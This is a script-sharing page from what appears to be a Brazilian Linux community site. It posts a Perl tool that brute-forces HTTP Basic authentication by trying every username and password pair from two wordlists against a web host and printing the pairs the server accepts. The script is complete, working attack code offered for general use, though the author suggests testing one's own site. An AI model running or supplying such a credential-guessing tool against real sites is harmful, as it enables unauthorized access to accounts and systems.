brute_basic
Publicado por Marcelo 25/01/2004
[ Hits: 6.104 ]
Script que faz brute-force em autenticação via web do tipo Basic (digest ainda não foi incluído), o script precisa de duas listas de nomes, para usuários e senhas, você pode escolher entre método HEAD e GET (alguns sites bloqueiam HEAD), mas como o script ainda não trabalha com threads, ele é extremamente lento para grandes brute-forces, por isso é mais recomendado para testar o seu próprio website, o script utiliza HTTP 1.1, espero que em próximas versões eu inclua threads...
#!/usr/bin/perl
use Socket;
use IO::Socket;
use MIME::Base64;
if ($ARGV[3] =~ /g/) { $metodo='GET'; print "Utilizando método GET ao invés de H
EAD\n"; }
else { $metodo='HEAD'; }
open(logins,$ARGV[1]);
@url=split(/\//,$ARGV[0]);
$get='/';
$ip=gethostbyname($url[0]);
if ($ip) { $ip=inet_ntoa($ip); }
else {
print "Erro no DNS ao tentar resolver $url[0]!\n";
exit(1);
}
for ($i=1;$url[$i];$i++) {
$get="$get/$url[$i]";
}
if (substr($ARGV[0],(length($ARGV[0])-1)) eq '/') { $get="$get/"; }
print "Iniciando tentativa de brute-force em $url[0]\n";
for ($nl=0;($user=<logins>);$nl++) {
chop $user;
close(senhas);
open(senhas,$ARGV[2]);
for ($np=0;($senha=<senhas>);$np++) {
chop $senha;
$final=encode_base64("$user:$senha");
$sock=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>80,Timeout=>3);
if ($sock) { print $sock "$metodo $get HTTP/1.1\nHost: $url[0]\nAuthorization:
Basic $final\n\n"; }
@div=split(/ /,<$sock>);
if ($div[1] eq '403') {
print "Forbidden retornado do servidor, pode ser um anti brute-force\n";
}
elsif ($div[1] eq '405') {
print "O método $metodo não é permitido pelo servidor:\n";
if ($metodo eq 'HEAD') {
print "Tente usar a opção -g no final, que utiliza GET";
}
else {
print "Alguma coisa muito estranha está acontecendo... o servidor não suporta o método GET, não é impossível, mas simplesmente inútil e impede a navegação normal. Verifique se está tudo certo e se o site é navegável!";
}
print "\nFechando o brute-force.\n";
exit(1);
}
else {
if ($div[1] ne '401') {
print "$user:$senha -> OK! <-> Retorno: $div[1]\n";
$a++;
}
}
# print "$div[0] $div[1] $div[2]\n";
close($sock);
}
}
if (!$a) { $a=0; }
print "Programa terminado, combinações tentadas: ".($nl*$np).", senhas achadas: $a\n";
Nenhum comentário foi encontrado.
Patrocínio
Destaques
Atenção a quem posta conteúdo de dicas, scripts e tal (2)
Artigos
Criando um gateway de internet com o Debian
Configuração básica do Conky para mostrar informações sobre a sua máquina no Desktop
Aprenda a criar músicas com Inteligência Artificial usando Suno AI
Entendendo o que é URI, URL, URN e conhecendo as diferenças entre POST e GET
Ativando o Modo Noturno via Linha de Comando no GNOME/Wayland
Dicas
Preparando pendrive com GNU/Linux [Corretamente!]
Instalando Google Chrome no Fedora 40
Habilitando a importação de senhas no Firefox
Como corrigir o erro do VirtualBox travar a máquina virtual em tela cheia
Tópicos
Problema ao configurar Zabbix no ubuntu (10)
NOTEBUXO POSITIVO VAIO VJFE43F11X Something has gone seriously wrong... (2)
Como faço pra um script ser executado apenas abrindo um terminal e dan... (8)
O Programa Configurações Sumiu no Ubuntu 22.04 [RESOLVIDO] (5)
Top 10 do mês
-
Xerxes
1° lugar - 75.883 pts -
Fábio Berbert de Paula
2° lugar - 62.032 pts -
Clodoaldo Santos
3° lugar - 46.794 pts -
Sidnei Serra
4° lugar - 32.429 pts -
Buckminster
5° lugar - 28.053 pts -
Alberto Federman Neto.
6° lugar - 18.350 pts -
Daniel Lara Souza
7° lugar - 17.649 pts -
Mauricio Ferrari
8° lugar - 17.204 pts -
edps
9° lugar - 15.439 pts -
Diego Mendes Rodrigues
10° lugar - 15.278 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
